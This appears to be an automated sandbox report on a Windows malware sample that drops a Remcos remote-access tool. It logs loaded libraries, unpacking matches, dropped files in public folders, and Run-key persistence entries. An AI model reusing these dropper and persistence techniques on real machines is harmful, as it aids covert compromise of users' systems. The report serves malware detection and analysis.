              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: udVh4Ist4Z.exe Static file information: File size 1639424 > 1048576
              Source: udVh4Ist4Z.exe Static PE information: Raw size of DATA is bigger than: 0x100000 < 0x114800
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: Binary string: easinvoker.pdbH source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134401693.0000000014E81000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr

              Data Obfuscation

              Source: Yara match File source: 0.2.udVh4Ist4Z.exe.2cbe308.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.udVh4Ist4Z.exe.2d60000.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.udVh4Ist4Z.exe.2c59910.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.udVh4Ist4Z.exe.2c9ce08.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.udVh4Ist4Z.exe.2cbe308.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000F.00000002.2561591986.0000000002E21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2296612772.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: nmfsxfjX.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D77AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_02D77AC0
              Source: initial sample Static PE information: section where entry point is pointing to: .
              Source: remcos.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x1768a
              Source: netutils.dll.0.dr Static PE information: real checksum: 0x2c00d should be: 0x1f08e
              Source: nmfsxfjX.pif.0.dr Static PE information: real checksum: 0x0 should be: 0x1768a
              Source: udVh4Ist4Z.exe Static PE information: real checksum: 0x0 should be: 0x19fb50
              Source: Xjfxsfmn.PIF.5.dr Static PE information: real checksum: 0x0 should be: 0x19fb50
              Source: remcos.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x1768a
              Source: easinvoker.exe.0.dr Static PE information: section name: .imrsiv
              Source: netutils.dll.0.dr Static PE information: section name: .
              Source: netutils.dll.0.dr Static PE information: section name: /4
              Source: netutils.dll.0.dr Static PE information: section name: /19
              Source: netutils.dll.0.dr Static PE information: section name: /31
              Source: netutils.dll.0.dr Static PE information: section name: /45
              Source: netutils.dll.0.dr Static PE information: section name: /57
              Source: netutils.dll.0.dr Static PE information: section name: /70
              Source: netutils.dll.0.dr Static PE information: section name: /81
              Source: netutils.dll.0.dr Static PE information: section name: /92
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_0296009D push dword ptr [esi-5D3DF0BBh]; retf 0_3_029600B1
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02962BAE push dword ptr [esi-5D3D056Dh]; iretd 0_3_02962BB5
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_029623C9 push dword ptr [esi-5D3D05BBh]; iretd 0_3_029623DD
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02A8C6F9 push cs; retf 0_3_02A8C6FE
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02A7D0DF push esi; ret 0_3_02A7D0EC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02A8802D push ss; retf 0_3_02A88053
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02A8C120 push es; retf 0_3_02A8C12B
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D632F0 push eax; ret 0_2_02D6332C
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D8A2F4 push 02D8A35Fh; ret 0_2_02D8A357
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D7D20C push ecx; mov dword ptr [esp], edx 0_2_02D7D211
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D66374 push 02D663CFh; ret 0_2_02D663C7
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D66372 push 02D663CFh; ret 0_2_02D663C7
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D8A0AC push 02D8A125h; ret 0_2_02D8A11D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D73027 push 02D73075h; ret 0_2_02D7306D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D73028 push 02D73075h; ret 0_2_02D7306D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D8A1F8 push 02D8A288h; ret 0_2_02D8A280
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D8A144 push 02D8A1ECh; ret 0_2_02D8A1E4
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D66740 push 02D66782h; ret 0_2_02D6677A
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D6673E push 02D66782h; ret 0_2_02D6677A
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D6D55C push 02D6D588h; ret 0_2_02D6D580
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D6C528 push ecx; mov dword ptr [esp], edx 0_2_02D6C52D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D6CBA8 push 02D6CD2Eh; ret 0_2_02D6CD26
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D89B58 push 02D89D76h; ret 0_2_02D89D6E
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D79B58 push 02D79B90h; ret 0_2_02D79B88
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D6C8D6 push 02D6CD2Eh; ret 0_2_02D6CD26
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D778C8 push 02D77945h; ret 0_2_02D7793D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D76904 push 02D769AFh; ret 0_2_02D769A7

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Xjfxsfmn.PIF
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe File created: C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00406EB0 ShellExecuteW,URLDownloadToFileW, 6_1_00406EB0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif File created: C:\ProgramData\Remcos\remcos.exe
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe File created: C:\Users\Public\Libraries\easinvoker.exe
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe File created: C:\Users\Public\Libraries\netutils.dll
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif File created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe

              Boot Survival

              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Xjfxsfmn
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 6_1_0041AA4A
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D79B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02D79B94
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
